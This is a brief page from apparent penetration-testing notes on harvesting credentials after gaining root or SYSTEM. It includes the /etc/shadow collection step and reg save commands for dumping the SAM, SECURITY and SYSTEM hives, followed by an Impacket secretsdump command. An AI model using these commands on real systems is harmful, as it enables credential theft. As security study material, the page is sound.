Loot
Once we are root
or NT AUTHORITY\SYSTEM
it's time to collect some loot. 🤑🤑🤑
Linux
Dump users and passwords
Collect files on target
/etc/passwd
/erc/shadow
Then unshadow and crack them.
Windows
Dump SAM
Collect files on target
reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\system
Then crack them using Impackets' secretsdump
secretsdump.py -sam sam -security security -system system LOCAL
Dump NTDS (DC)
By default, the Ntds.dit
file is located in %SystemRoot%\NTDS\Ntds.dit
of a domain controller.
TODO (see /13-misc/impacket.md)
Last updated